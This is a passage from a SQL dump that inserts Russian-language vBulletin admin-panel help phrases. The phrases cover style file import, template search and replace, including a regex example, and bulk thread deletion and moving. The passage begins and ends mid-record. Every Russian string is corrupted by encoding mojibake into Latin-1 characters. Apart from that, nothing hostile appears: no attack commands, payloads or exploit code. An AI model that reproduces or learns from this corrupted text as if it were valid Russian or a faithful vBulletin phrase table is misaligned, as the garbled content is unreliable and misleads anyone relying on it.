âûáåðèòå ôàéë ñòèëÿ vBullein äëÿ çàãðóçêè ñ âàøåãî êîìïüþòåðà.', 'vbulletin', '', 0, ''), (24071, -1, 'template_files_stylefile_title', 'cphelptext', 'Çàãðóçêà ôàéëà XML', 'vbulletin', '', 0, ''), (24072, -1, 'template_files_serverfile_text', 'cphelptext', 'Ââåäèòå èìÿ ôàéëà âìåñòå ñ ïóòåì ñåðâåðà îòíîñèòåëüíî âàøåé ãëàâíîé äèðåêòîðèè ôîðóìà.

\r\n\r\nÃàïðèìåð, åñëè èìÿ ôàéëà ñî ñòèëåì vbulletin-style.xml è âû çàãðóçèëè åãî â äèðåêòîðèþ install âíóòðè âàøåé ãëàâíîé äèðåêòîðèè ôîðóìà, òî âàì ñëåäóåò ââåñòè çäåñü: ./install/vbulletin-style.xml', 'vbulletin', '', 0, ''), (24073, -1, 'template_files_serverfile_title', 'cphelptext', 'Èìïîðòèðîâàíèå XML Ôàéëà', 'vbulletin', '', 0, ''), (24074, -1, 'template_files_overwritestyleid_text', 'cphelptext', 'Âûáåðèòå ñòèëü äëÿ ñëèÿíèÿ èëè ïðîïóñòèòå ïóíêò äëÿ ñîçäàíèÿ íîâîãî ñòèëÿ. Åñëè âû âûáðàëè ñîçäàíèå íîâîãî ñòèëÿ, òî íå çàáóäüòå óêàçàòü îïöèè íèæå.', 'vbulletin', '', 0, ''), (24075, -1, 'template_files_overwritestyleid_title', 'cphelptext', 'Ñëèÿíèå ñî ñòèëåì', 'vbulletin', '', 0, ''), (24076, -1, 'template_files_anyversion_text', 'cphelptext', 'Âîçìîæíî, âû ïîæåëàåòå ïðîèãíîðèðîâàòü âåðñèþ ôàéëà ñòèëÿ ïðè çàãðóçêå, íî âû äîëæíû çíàòü, ÷òî îí áóäåò ñîäåðæàòü òîëüêî èçìåíåííûå øàáëîíû, ñîâìåñòèìûå ñ âàøåé âåðñèåé. Äàæå åñëè ñòèëü íå ñîâìåñòèì ñ âàøåé âåðñèåé, âû âñåãäà ìîæåòå çàãðóçèòü åãî è â ïîñëåäñòâèè èñïðàâèòü øàáëîíû, èñïîëüçóÿ ñòðàíèöó Ãàéòè îáíîâëåííûå øàáëîíû, êàê ðóêîâîäñòâî.', 'vbulletin', '', 0, ''), (24077, -1, 'template_files_anyversion_title', 'cphelptext', 'Èãíîðèðîâàòü âåðñèþ ñòèëÿ', 'vbulletin', '', 0, ''), (24078, -1, 'template_findupdates_text', 'cphelptext', 'Îáû÷íûå øàáëîíû ôîðóìà ÷àñòî îáíîâëÿþòñÿ ïðè îáíîâëåíèÿõ. Ãòà ñòðàíèöà îòîáðàæàåò, êàêèå èçìåíåííûå øàáëîíû ñëåäóåò âîññòàíîâèòü è çàíîâî èçìåíèòü ïîñëå èçìåíåíèÿ îáû÷íûõ øàáëîíîâ.', 'vbulletin', '', 0, ''), (24079, -1, 'template_findupdates_title', 'cphelptext', 'Ãàéòè îáíîâëåííûå øàáëîíû', 'vbulletin', '', 0, ''), (24080, -1, 'template_history_text', 'cphelptext', 'Ãòà ñòðàíèöà ïîêàçûâàåò çàïèñè âñåõ èçìåíåíèé, ñäåëàííûõ ñ ýòèì øàáëîíîì. Åñëè øàáëîí ïî óìîë÷àíèþ áûë îáíîâëåí ïîñëå èçìåíåíèÿ äðóãîãî øàáëîíà, òî âåðîÿòíî òðåáóåòñÿ èñïðàâëåíèå ïîñëåäíåãî (ðó÷íîå èçìåíåíèå èëè æå ïåðåñòðîåíèå è ïåðåíàñòðîéêà).

\r\n\r\nÂû ìîæåòå ïîñìîòðåòü ñðàâíåíèå \"ñëîâî ê ñëîâó\" ñòàðîãî è íîâîãî øàáëîíîâ, íàæàâ íà êíîïêó \"Ñðàâíèòü âåðñèè\".', 'vbulletin', '', 0, ''), (24081, -1, 'template_history_title', 'cphelptext', 'Èñòîðèÿ øàáëîíîâ', 'vbulletin', '', 0, ''), (24082, -1, 'template_historysubmit_text', 'cphelptext', 'Ãòà ñòðàíèöà ïîçâîëèò âàì ñðàâíèòü òåêóùóþ âåðñèþ øàáëîíà è øàáëîí ïî óìîë÷àíèþ. Èçìåíåíèÿ âûäåëåíû öâåòîì (ñìîòðè ëåãåíäó âíèçó ñòðàíèöû). Ãòà ñòðàíèöà ïîëåçíà äëÿ ñàìîñòîÿòåëüíîãî îáíîâëåíèÿ èçìåíèâøèõñÿ øàáëîíîâ ïîä íîâûå ôóíêöèè.', 'vbulletin', '', 0, ''), (24083, -1, 'template_historysubmit_title', 'cphelptext', 'Ñðàâíèòü âåðñèè', 'vbulletin', '', 0, ''), (24084, -1, 'template_modify_text', 'cphelptext', 'Çäåñü âû ìîæåòå óïðàâëÿòü ñâîèìè ñòèëÿìè.

\r\n\r\nÎòìåòêè ñëåâà îò êàæäîãî ñòèëÿ îçíà÷àþò, äîñòóïåí ëè ýòîò ñòèëü äëÿ âûáîðà äëÿ èñïîëüçîâàíèÿ íà âàøåì ôîðóìå ïîëüçîâàòåëÿì èëè íåò. Îòìå÷åíî - ìîæíî âûáèðàòü, íå îòìå÷åíî - íåëüçÿ âûáèðàòü.

\r\n\r\n×òîáû ïðîñìîòðåòü âàø ôîðóì, èñïîëüçóÿ âûáðàííûé ñòèëü, ïðîñòî íàæìèòå íà íàçâàíèå ñòèëÿ íà ýòîé ñòðàíèöå.

\r\n\r\nÃîëå ñ ÷èñëàìè äî ìåíþ îïöèé ó êàæäîãî ñòèëÿ îçíà÷àåò ïîðÿäîê îòîáðàæåíèÿ. Âû ìîæåòå îáíîâèòü ïîðÿäîê îòîáðàæåíèÿ íà ýòîé ñòðàíèöå, èçìåíÿÿ ââåäåííûå ÷èñëà è íàæàâ íà êíîïêó \"Ñîõðàíèòü ïîðÿäîê îòîáðàæåíèÿ\" âíèçó ñòðàíèöû.

\r\n\r\n ìåíþ ñïðàâà íàõîäèòñÿ ñïèñîê îïöèé äëÿ êàæäîãî ñòèëÿ.

\r\n\r\nÃàêîíåö, êíîïêà \"« »\" ñïðàâà îòîáðàçèò ñïèñîê øàáëîíîâ äëÿ êàæäîãî ñòèëÿ.', 'vbulletin', '', 0, ''), (24085, -1, 'template_modify_title', 'cphelptext', 'Óïðàâëåíèå ñòèëÿìè', 'vbulletin', '', 0, ''), (24086, -1, 'template_rebuild_text', 'cphelptext', 'Ãà ýòîé ñòðàíèöå íàõîäÿòñÿ ñîîáùåíèå è ïîäòâåðæäåíèå î ïåðåñòðîåíèè âàøèõ ñòèëåé.', 'vbulletin', '', 0, ''), (24087, -1, 'template_rebuild_title', 'cphelptext', 'Ãåðåñòðîèòü ñòèëè', 'vbulletin', '', 0, ''), (24088, -1, 'template_revertall_text', 'cphelptext', 'Ãòà ñòðàíèöà ïîçâîëÿåò âàì âîññòàíîâèòü âñå èçìåí¸ííûå øàáëîíû äëÿ ýòîãî ñòèëÿ. Ãèæå íàõîäèòñÿ ñïèñîê øàáëîíîâ, êîòîðûå áóäóò âîññòàíîâëåíû.', 'vbulletin', '', 0, ''), (24089, -1, 'template_revertall_title', 'cphelptext', 'Âîññòàíîâëåíèå âñåõ øàáëîíîâ', 'vbulletin', '', 0, ''), (24090, -1, 'template_search_text', 'cphelptext', 'Ãà ýòîé ñòðàíèöå âû ìîæåòå èñêàòü ñòðîêè â øàáëîíàõ (ïîëåçíî ïðè ïîèñêå øàáëîíîâ, êîòîðûå âû æåëàåòå îòðåäàêòèðîâàòü, ÷òîáû èçìåíèòü ÷òî-íèáóäü íà âàøåì ôîðóìå) è çàïóñòèòü ïîèñê \"Ãîèñê è çàìåíà\", êîòîðûé ïîçâîëèò âàì çàìåíèòü âñå íàéäåííûå ñòðîêè äðóãîé ñòðîêîé.', 'vbulletin', '', 0, ''), (24091, -1, 'template_search_title', 'cphelptext', 'Ãîèñê â øàáëîíàõ', 'vbulletin', '', 0, ''), (24092, -1, 'template_search_searchset_text', 'cphelptext', 'Âûáåðèòå ñòèëü, â êîòîðîì æåëàåòå èñêàòü.', 'vbulletin', '', 0, ''), (24093, -1, 'template_search_searchset_title', 'cphelptext', 'Ãîèñê â ñòèëå', 'vbulletin', '', 0, ''), (24094, -1, 'template_search_searchstring_text', 'cphelptext', 'Ââåäèòå ñòðîêó, êîòîðóþ æåëàåòå íàéòè. Ãòà ñòðîêà çàâèñèìà îò ðåãèñòðà. Ãðè ïîèñêå íàéäóòñÿ âñå ñëîâà/ôðàçû, ñîäåðæàùèå ââåäåííóþ ñòðîêó. Ãàïðèìåð, ïðè ïîèñêå \"carrot\" íàéäóòñÿ ñëîâà \"thecarrot\", \"carrots\" è ò.ä..', 'vbulletin', '', 0, ''), (24095, -1, 'template_search_searchstring_title', 'cphelptext', 'Ãîèñê òåêñòà', 'vbulletin', '', 0, ''), (24096, -1, 'template_search_titlesonly_text', 'cphelptext', 'Åñëè ýòà îïöèÿ âêëþ÷åíà, ïîèñê áóäåò èäòè òîëüêî ïî íàçâàíèÿì øàáëîíîâ. Çäåñü äåéñòâóþò òå æå ñàìûå ïðàâèëà ïîèñêà, ÷òî è îáúÿñíÿþòñÿ çäåñü.', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'), (24097, -1, 'template_search_titlesonly_title', 'cphelptext', 'Èñêàòü òîëüêî â çàãîëîâêàõ', 'vbulletin', '', 0, ''), (24098, -1, 'template_search_dostyleid_text', 'cphelptext', 'Âûáåðèòå ñòèëü, â êîòîðîì æåëàåòå èñêàòü.', 'vbulletin', '', 0, ''), (24099, -1, 'template_search_dostyleid_title', 'cphelptext', 'Ãîèñê â ñòèëå', 'vbulletin', '', 0, ''), (24100, -1, 'template_search_replacestring_text', 'cphelptext', 'Ââåäèòå ñþäà çàìåíÿþùóþ ñòðîêó. Ãòà ñòðîêà çàìåíèò âñå íàéäåííûå çíà÷åíèÿ ñòðîêè âûøå.

\r\n\r\nÃàïðèìåð, åñëè âû èùèòå \"carrot\" è âàøà çàìåíÿþùàÿ ñòðîêà \"Carot\", òî \"zcarrot\" ñòàíåò \"zCarot\".', 'vbulletin', '', 0, ''), (24101, -1, 'template_search_replacestring_title', 'cphelptext', 'Çàìåíà òåêñòîì', 'vbulletin', '', 0, ''), (24102, -1, 'template_search_test_text', 'cphelptext', 'Ãòà îïöèÿ ïîçâîëèò âàì óâèäåòü ðåçóëüòàòû \"ïîèñêà è çàìåíû\" äî âûïîëíåíèÿ äåéñòâèÿ. Ãåêîìåíäóåòñÿ âñåãäà äåëàòü ýòî, òàê êàê î÷åíü ëåãêî ìîæíî ñëó÷àéíî íàéòè è çàìåíèòü íå òî, ÷òî õîòåëîñü.', 'vbulletin', '', 0, ''), (24103, -1, 'template_search_test_title', 'cphelptext', 'Òîëüêî òåñò çàìåíû', 'vbulletin', '', 0, ''), (24104, -1, 'template_search_regex_text', 'cphelptext', 'Ãåãóëÿðíûå âûðàæåíèÿ - îïöèÿ òîëüêî äëÿ ïðîäâèíóòûõ ïîëüçîâàòåëåé! Óñòàíîâêà ýòîé îïöèè â \"Äà\" áóäåò èñïîëüçîâàòü preg_replace() âìåñòî str_replace() äëÿ îïåðàöèè ïîèñêà/çàìåíû. ÃÃ¥ èñïîëüçóéòå ýòó îïöèþ, åñëè âû íå óâåðåíû, êàê èñïîëüçîâàòü ïðàâèëüíûå âûðàæåíèÿ PCRE!

\r\n\r\nÃðèìåð èñïîëüçîâàíèÿ: Ãîèñê <img (.*)/?> è çàìåíà íà <img \\1 /> íàøåë áû âñå òåãè <img> è çàìåíèë áû èõ XHTML ñîâìåñòèìûìè, äîáàâëÿÿ, ÷òî çàêðûòèå îáðàòíûì ñëåøåì. Ôàêòè÷åñêàÿ êîìàíäà, âûïîëíåííàÿ äëÿ ýòîãî, áûëà áû òàêîé:

\r\n\r\npreg_replace(\'#<img (.*)/?>#siU\', \'<img \\1 />\', $template);', 'vbulletin', '', 0, ''), (24105, -1, 'template_search_regex_title', 'cphelptext', 'Èñïîëüçîâàòü ðåãóëÿðíûå âûðàæåíèÿ', 'vbulletin', '', 0, ''), (24106, -1, 'template_search_case_insensitive_text', 'cphelptext', '\"Ãåãèñòðî-íåçàâèñèìûé\" ïîèñê ïðîèçâåä¸ò ïîèñê ôðàçû, íå ðàçëè÷àÿ ðåãèñòð. Ãàïðèìåð, ñòðîêà ïîèñêà:

\r\n\r\nzÌàðêîâü íàõ!

\r\n\r\n...íàéä¸ò ïîìèìî ïðî÷åãî:

\r\n\r\nzÌàðêÎÂü ÃàÕ!', 'vbulletin', '', 0, ''), (24107, -1, 'template_search_case_insensitive_title', 'cphelptext', 'Ãå÷óâñòâèòåëüíûé ê ðåãèñòðó', 'vbulletin', '', 0, ''), (24108, -1, 'template_view_text', 'cphelptext', 'Ãòà ñòðàíèöà îòîáðàçèò âàø îáû÷íûé êîä äëÿ ýòîãî øàáëîíà. Âû ìîæåòå ñêîïèðîâàòü êîä äëÿ èñïîëüçîâàíèÿ, íî îòðåäàêòèðîâàòü åãî íå ñìîæåòå.', 'vbulletin', '', 0, ''), (24109, -1, 'template_view_title', 'cphelptext', 'Ãîêàçàòü ïî óìîë÷àíèþ', 'vbulletin', '', 0, ''), (24110, -1, 'thread_text', 'cphelptext', 'Óïðàâëåíèå òåìàìè è ñîîáùåíèÿìè:
\r\nÃòîò ðàçäåë ïàíåëè àäìèíèñòðàòîðà ïîçâîëÿåò âàì ìàññîâî óïðàâëÿòü âàøèìè òåìàìè è ñîîáùåíèÿìè. Âû ìîæåòå ìàññîâî óäàëèòü èëè ïåðåìåñòèòü òåìû è ñîîáùåíèÿ, îñíîâûâàÿñü íà íåñêîëüêèõ êðèòåðèÿõ, ìàññîâî îòïèñàòü ïîëüçîâàòåëåé îò òåì, óäàëèòü îïðîñû èç òåì è óâèäåòü, êòî çà ÷òî ãîëîñîâàë â îïðîñàõ.

\r\n\r\nÂîçìîæíûì ïðèìåíåíèåì äëÿ ìàññîâîãî óäàëåíèÿ òåì ÿâëÿåòñÿ óäàëåíèå òåì ñïàìåðîâ è îñâîáîæäåíèå ìåñòà â âàøåé áàçå äàííûõ ñ ïîìîùüþ óäàëåíèÿ ñòàðûõ òåì.  ïðèìåíåíèå ìàññîâîãî ïåðåìåùåíèÿ âõîäèò ðåîðãàíèçàöèÿ âàøèõ ðàçäåëîâ è àðõèâèðîâàíèå ñòàðûõ òåì. Âû ìîæåòå îòïèñàòü ïîëüçîâàòåëåé îò òåì, ÷òîáû ïðåêðàòèòü îòñûëêó óâåäîìëåíèé ïî ýëåêòðîííîé ïî÷òå â ðåçóëüòàòå òåêóùèõ ïîäïèñîê íà òåìû. Âû ìîæåòå óäàëèòü îïðîñû èç òåìû, åñëè âû ïðîñòî æåëàåòå óäàëèòü îïðîñ áåç óäàëåíèÿ òåìû. È, íàêîíåö, îïöèÿ \"Êòî ãîëîñîâàë\" ïîëåçíà äëÿ ïðîâåðêè \"ñîäåðæèìîãî ÿùèêà äëÿ ãîëîñîâàíèÿ.\"', 'vbulletin', '', 0, ''), (24111, -1, 'thread_title', 'cphelptext', 'ÃŽ óïðàâëåíèè òåìàìè è ñîîáùåíèÿìè', 'vbulletin', 'zCarot', 1219189890, '3.8.0 Alpha 1'), (24112, -1, 'thread_dothreads_pruneuser_text', 'cphelptext', 'Ãà ýòîé ñòðàíèöå íàõîäÿòñÿ îïöèè äëÿ óäàëåíèÿ/ïåðåìåùåíèÿ âñåõ èëè âûáðàííûõ âàìè ñîîòâåòñòâóþùèõ òåì. Åñëè âû âûáåðèòå äåéñòâèå íàä âñåìè òåìàìè, òî îíî áóäåò ïðîèçâåäåíî íåìåäëåííî. Åñëè âû âûáåðèòå âûáîðî÷íîå äåéñòâèå, òî âàñ ïåðåíàïðàâÿò íà ñòðàíèöó, ãäå âàì íóæíî áóäåò îòìåòèòü íóæíûå òåìû.', 'vbulletin', '', 0, ''), (24113, -1, 'thread_dothreads_pruneuser_title', 'cphelptext', 'Âûáîðî÷íîå óäàëåíèå/ïåðåìåùåíèå òåì', 'vbulletin', '', 0, ''), (24114, -1, 'thread_dothreadssel_text', 'cphelptext', 'Ãèæå íàõîäèòñÿ ñïèñîê âñåõ ïîäõîäÿùèõ òåì. Îòìåòüòå âñå òåìû, íàä êîòîðûìè âû æåëàåòå ñîâåðøèòü äåéñòâèå. Ãàæìèòå êíîïêó \"Âïåð¸ä\" äëÿ ïðîäîëæåíèÿ. Âû ìîæåòå ïîñìîòðåòü òåìó â íîâîì îêíå, íàæàâ íà å¸ íàçâàíèå.', 'vbulletin', '', 0, ''), (24115, -1, 'thread_dothreadssel_title', 'cphelptext', 'Âûáîðî÷íîå óäàëåíèå/ïåðåìåùåíèå', 'vbulletin', '', 0, ''), (24116, -1, 'thread_dovotes_text', 'cphelptext', 'Ãòà ñòðàíèöà îòîáðàçèò âàì ðåçóëüòàòû ãîëîñîâàíèÿ, à òàêæå óêàæåò, êòî çà ÷òî ãîëîñîâàë â âûáðàííîì îïðîñå. Âû ìîæåòå ïðîñìîòðåòü ýòîò îïðîñ âìåñòå ñ åãî òåìîé, íàæàâ íà èõ ññûëêè â âåðõíåé ïàíåëè. Âû ìîæåòå ïðîñìîòðåòü ïðîôèëè ãîëîñîâàâøèõ ïîëüçîâàòåëåé, íàæàâ íà èõ èìåíà.', 'vbulletin', 'zCarot', 1204936670, '3.7.0 Release Candidate 1'), (24117, -1, 'thread_dovotes_title', 'cphelptext', 'Ãåçóëüòàòû ãîëîñîâàíèÿ', 'vbulletin', '', 0, ''), (24118, -1, 'thread_killpoll_text', 'cphelptext', 'Ãòà ñòðàíèöà ïîçâîëÿåò âàì óäàëèòü îïðîñ èç òåìû, îñíîâûâàÿñü íà ID ñîîòâåòñòâóþùåé òåìû.', 'vbulletin', '', 0, ''), (24119, -1, 'thread_killpoll_title', 'cphelptext', 'Óäàëèòü îïðîñ', 'vbulletin', '', 0, ''), (24120, -1, 'thread_killpoll_threadid_text', 'cphelptext', 'Ââåäèòå ID òåìû, èç êîòîðîé æåëàåòå óäàëèòü îïðîñ. Âû ìîæåòå óçíàòü ID íóæíîé òåìû, âçãëÿíóâ íà å¸ àäðåñ. Ãàïðèìåð, òåìà ñ URL http://www.example.com/forum/showthread.php?t=2 èìååò ID òåìû 2.', 'vbulletin', '', 0, ''), (24121, -1, 'thread_killpoll_threadid_title', 'cphelptext', 'Ââåäèòå ID òåìû', 'vbulletin', '', 0, ''), (24122, -1, 'thread_move_text', 'cphelptext', 'Ãòà ñòðàíèöà ïîçâîëÿåò âàì ìàññîâî ïåðåìåùàòü òåìû, îñíîâûâàÿñü íà íåñêîëüêèõ êðèòåðèÿõ. Çàïîëíèòå îïöèè íèæå è íàæìèòå \"Ãåðåìåñòèòü òåìû\" äëÿ âûïîëíåíèÿ. Ãàæàòèå íà êíîïêó \"Ãåðåìåñòèòü òåìû\" ñðàçó íå âûïîëíÿåò ïåðåìåùåíèå, à ñíà÷àëà äà¸ò âàì âûáîð ïîëíîãî èëè âûáîðî÷íîãî ïåðåìåùåíèÿ âñåõ ñîîòâåòñòâèé.', 'vbulletin', '', 0, ''), (24123, -1, 'thread_move_title', 'cphelptext', 'Óïðàâëåíèå ïåðåìåùåíèåì òåì', 'vbulletin', '', 0, ''), (24124, -1, 'thread_move_destforumid_text', 'cphelptext', 'Âûáåðèòå ðàçäåë, â êîòîðûé âû æåëàåòå ïåðåìåñòèòü òåìû, ñîîòâåòñòâóþùèå êðèòåðèÿì íèæå.', 'vbulletin', '', 0, ''), (24125, -1, 'thread_move_destforumid_title', 'cphelptext', 'Ãîìåñòèòü â ðàçäåë', 'vbulletin', '', 0, ''); INSERT INTO `phrase` (`phraseid`, `languageid`, `varname`, `fieldname`, `text`, `product`, `username`, `dateline`, `version`) VALUES (24126, -1, 'thread_prune_text', 'cphelptext', 'Ãòà ñòðàíèöà ïîçâîëÿåò âàì ìàññîâî óäàëÿòü òåìû, îñíîâûâàÿñü íà íåñêîëüêèõ êðèòåðèÿõ. Çàïîëíèòå îïöèè íèæå è íàæìèòå \"Óäàëèòü òåìû\" äëÿ âûïîëíåíèÿ. Ãàæàòèå íà êíîïêó \"Óäàëèòü òåìû\" ñðàçó íå âûïîëíÿåò óäàëåíèå, à ñíà÷àëà äà¸ò âàì âûáîð ïîëíîãî èëè âûáîðî÷íîãî óäàëåíèÿ âñåõ ñîîòâåòñòâèé.', 'vbulletin', '', 0, ''), (24127, -1, 'thread_prune_title', 'cphelptext', 'Óïðàâëåíèå óäàëåíèåì òåì', 'vbulletin', '', 0, ''), (24128, -1, 'thread_prune_username_text', 'cphelptext', 'Äëÿ óäàëåíèÿ òåì ïî èìåíè ñîçäàòåëÿ òåìû âàì ñëåäóåò óêàçàòü çäåñü åãî èìÿ. Ââåäèòå òî÷íîå èìÿ ïîëüçîâàòåëÿ, ÷üè òåìû âû æåëàåòå óäàëèòü.', 'vbulletin', '', 0, ''), (24129, -1, 'thread_prune_username_title', 'cphelptext', 'Èìÿ', 'vbulletin', '', 0, ''), (24130, -1, 'thread_prune_move_originaldaysolder_text', 'cphelptext', 'Åñëè òåìà ñîçäàíà áîëåå Õ äíåé íàçàä, òî îíà áóäåò óäàëåíà/ïåðåìåùåíà. Ãòî ïîëåçíî äëÿ âûáîðêè ñòàðûõ òåì.', 'vbulletin', '', 0, ''), (24131, -1, 'thread_prune_move_originaldaysolder_title', 'cphelptext', 'Ãåðâîå ñîîáùåíèå îòïðàâëåíî áîëåå X äíåé íàçàä', 'vbulletin', '', 0, ''), (24132, -1, 'thread_prune_move_originaldaysnewer_text', 'cphelptext', 'Åñëè òåìà ñîçäàíà â òå÷åíèè Õ äíåé, òî îíà áóäåò óäàëåíà/ïåðåìåùåíà. Âû ìîæåòå èñïîëüçîâàòü ýòó îïöèþ âìåñòå ñ ïðåäûäóùåé, ÷òîáû ñîçäàòü âðåìåííîé ïðîìåæóòîê, â êîòîðîì ñëåäóåò óäàëèòü/ïåðåìåñòèòü òåìû.', 'vbulletin', '', 0, ''), (24133, -1, 'thread_prune_move_originaldaysnewer_title', 'cphelptext', 'Ãåðâîå ñîîáùåíèå îòïðàâëåíî ìåíåå X äíåé íàçàä', 'vbulletin', '', 0, ''), (24134, -1, 'thread_prune_move_lastdaysolder_text', 'cphelptext', 'Åñëè íèêòî íå îñòàâëÿë ñîîáùåíèÿ â ýòîé òåìå êàê ìèíèìóì Õ äíåé, òî îíà áóäåò óäàëåíà/ïåðåìåùåíà. Ãòî ïîëåçíî äëÿ âûáîðêè òåì, êîòîðûå óæå íå àêòèâíû.', 'vbulletin', '', 0, ''), (24135, -1, 'thread_prune_move_lastdaysolder_title', 'cphelptext', 'Ãîñëåäíåå ñîîáùåíèå îòïðàâëåíî áîëåå X äíåé íàçàä', 'vbulletin', '', 0, ''), (24136, -1, 'thread_prune_move_lastdaysnewer_text', 'cphelptext', 'Åñëè êòî-òî íàïèñàë â ýòîé òåìå â òå÷åíèè Õ äíåé, òî îíà áóäåò óäàëåíà/ïåðåìåùåíà. Âû ìîæåòå èñïîëüçîâàòü ýòó îïöèþ âìåñòå ñ ïðåäûäóùåé, ÷òîáû ñîçäàòü âðåìåííîé ïðîìåæóòîê, â êîòîðîì ñëåäóåò óäàëèòü/ïåðåìåñòèòü òåìû.', 'vbulletin', '', 0, ''), (24137, -1, 'thread_prune_move_lastdaysnewer_title', 'cphelptext', 'Ãîñëåäíåå ñîîáùåíèå îòïðàâëåíî ìåíåå X äíåé íàçàä', 'vbulletin', '', 0, ''), (24138, -1, 'thread_prune_move_repliesleast_text', 'cphelptext', 'Åñëè â òåìå åñòü êàê ìèíèìóì Õ îòâåòîâ, òî îíà áóäåò óäàëåíà/ïåðåìåùåíà. Ãòî ïîëåçíî äëÿ óäàëåíèÿ/ïåðåìåùåíèÿ áîëüøèõ òåì.', 'vbulletin', '', 0, ''), (24139, -1, 'thread_prune_move_repliesleast_title', 'cphelptext', 'Òåìà èìååò íå ìåíåå X îòâåòîâ', 'vbulletin', '', 0, ''), (24140, -1, 'thread_prune_move_repliesmost_text', 'cphelptext', 'Åñëè â òåìå ñîäåðæèòñÿ ìåíåå Õ îòâåòîâ, òî îíà áóäåò óäàëåíà/ïåðåìåùåíà. Âû ìîæåòå èñïîëüçîâàòü ýòó îïöèþ âìåñòå ñ ïðåäûäóùåé, ÷òîáû çàäàòü ïðîìåæóòîê äëÿ îòâåòîâ, â êîòîðîì ñëåäóåò óäàëèòü/ïåðåìåñòèòü òåìû.', 'vbulletin', '', 0, ''), (24141, -1, 'thread_prune_move_repliesmost_title', 'cphelptext', 'Òåìà èìååò íå áîëåå X îòâåòîâ', 'vbulletin', '', 0, ''), (24142, -1, 'thread_prune_move_viewsleast_text', 'cphelptext', 'Åñëè òåìó ïðîñìîòðåëè áîëüøå ÷åì Õ ðàç, òî îíà áóäåò óäàëåíà/ïåðåìåùåíà. Ãòî ïîëåçíî äëÿ óäàëåíèÿ/ïåðåìåùåíèÿ ïîïóëÿðíûõ òåì.', 'vbulletin', '', 0, ''), (24143, -1, 'thread_prune_move_viewsleast_title', 'cphelptext', 'Òåìà èìååò íå ìåíåå X ïðîñìîòðîâ', 'vbulletin', '', 0, ''), (24144, -1, 'thread_prune_move_viewsmost_text', 'cphelptext', 'Åñëè òåìó ïðîñìîòðåëè ìåíåå Õ ðàç, òî îíà áóäåò óäàëåíà/ïåðåìåùåíà. Âû ìîæåòå èñïîëüçîâàòü ýòó îïöèþ âìåñòå ñ ïðåäûäóùåé, ÷òîáû çàäàòü ïðîìåæóòîê äëÿ ïðîñìîòðîâ, â êîòîðîì ñëåäóåò óäàëèòü/ïåðåìåñòèòü òåìû.', 'vbulletin', '', 0, ''), (24145, -1, 'thread_prune_move_viewsmost_title', 'cphelptext', 'Òåìà èìååò íå áîëåå X ïðîñìîòðîâ', 'vbulletin', '', 0, ''), (24146, -1, 'thread_prune_move_issticky_text', 'cphelptext', 'Âàæíàÿ òåìà - òà òåìà, ñòàòóñ êîòîðîé áûë óñòàíîâëåí àäìèíèñòðàòîðîì èëè ìîäåðàòîðîì â ñîñòîÿíèå \"Âàæíàÿ\". Âàæíûå òåìû îòîáðàæàþòñÿ íàâåðõó ñïèñêà òåì ðàçäåëà íå çàâèñèìî îò äàòû ïîñëåäíåãî ñîîáùåíèÿ â íåé. Âû ìîæåòå èñïîëüçîâàòü ýòó îïöèþ äëÿ âûáîðêè âàæíûõ èëè íå âàæíûõ òåì, ëèáî òåõ è äðóãèõ.', 'vbulletin', '', 0, ''), (24147, -1, 'thread_prune_move_issticky_title', 'cphelptext', 'Òåìà âàæíàÿ', 'vbulletin', '', 0, ''), (24148, -1, 'thread_prune_move_state_text', 'cphelptext', 'Ãðîâåðåíà:
\r\nÃðîâåðåííàÿ òåìà - òà, êîòîðàÿ íå îæèäàåò ïîäòâåðæäåíèÿ àäìèíèñòðàòîðà èëè ìîäåðàòîðà. Âû ìîæåòå èñïîëüçîâàòü ýòó îïöèþ, ÷òîáû âûáðàòü òîëüêî ïðîâåðåííûå òåìû, íå ïðîâåðåííûå, ëèáî òå è äðóãèå.

\r\n\r\nÃÃ¥ ïðîâåðåíà:
\r\nÒåìà îæèäàåò ïðîâåðêè, åñëè îíà äîëæíà áûòü ïîäòâåðæäåíà àäìèíèñòðàòîðîì èëè ìîäåðàòîðîì äî òîãî, êàê îíà áóäåò îòîáðàæàòüñÿ â ñïèñêå òåì.

\r\n\r\nÓäàëåíà:
\r\nÊîãäà àäìèíèñòðàòîð èëè ìîäåðàòîð óäàëÿåò òåìó, îí ìîæåò âûáðàòü \"ìÿãêîå\" èëè \"ïîëíîå\" óäàëåíèå. \"Ìÿãêîå\" óäàëåíèå ïðîñòî óáåð¸ò òåìó îò ïóáëè÷íîãî ïðîñìîòðà è îñòàâèò íà ýòîì ìåñòå \"óâåäîìëåíèå îá óäàëåíèè\". Ãòà îïöèÿ ññûëàåòñÿ íà \"ìÿãêîå\" óäàëåíèå, êîãäà òåìû âñ¸ åù¸ ñóùåñòâóþò è ìîãóò áûòü âîññòàíîâëåíû. Âû ìîæåòå èñïîëüçîâàòü ýòó îïöèþ äëÿ âûáîðêè òîëüêî \"ìÿãêî\" óäàë¸ííûõ òåì, íå óäàë¸ííûõ òåì, à òàêæå òåõ è äðóãèõ.', 'vbulletin', '', 0, ''), (24149, -1, 'thread_prune_move_state_title', 'cphelptext', 'Ñîñòîÿíèå òåìû', 'vbulletin', '', 0, ''), (24150, -1, 'thread_prune_move_status_text', 'cphelptext', 'Îòêðûòà:
\r\nÎòêðûòàÿ òåìà - òà, â êîòîðîé ìîãóò ïèñàòü ïîëüçîâàòåëè. Âû ìîæåòå èñïîëüçîâàòü ýòó îïöèþ äëÿ âûáîðà òîëüêî îòêðûòûõ òåì.

\r\n\r\nÇàêðûòà:
\r\nÇàêðûòàÿ òåìà - òåìà, êîòîðóþ çàêðûë àäìèíèñòðàòîð, ìîäåðàòîð èëè äðóãîé ïîëüçîâàòåëü, ñ ñîîòâåòñòâóþùèìè ïðàâàìè. Ãîëüçîâàòåëè íå ìîãóò îòâå÷àòü â çàêðûòûõ òåìàõ. Âû ìîæåòå èñïîëüçîâàòü ýòó îïöèþ äëÿ âûáîðà òîëüêî çàêðûòûõ òåì.

\r\n\r\nÃåðåìåùåíèå:
\r\nÊîãäà àäìèíèñòðàòîð èëè ìîäåðàòîð ïåðåìåùàåò òåìó â äðóãîé ðàçäåë, îí ìîæåò îòñòàâèòü â äàííîì ðàçäåëå ññûëêó, ïåðåìåùàþùóþ íà íîâîå ìåñòîïîëîæåíèå òåìû. Ãòî íàçûâàåòñÿ ïåðåìåùåíèåì. Âû ìîæåòå èñïîëüçîâàòü ýòó îïöèþ, ÷òîáû âûáðàòü òîëüêî òåìû-ïåðåìåùåíèÿ.

\r\n\r\nÃÃ¥ ïåðåìåùåíèå:
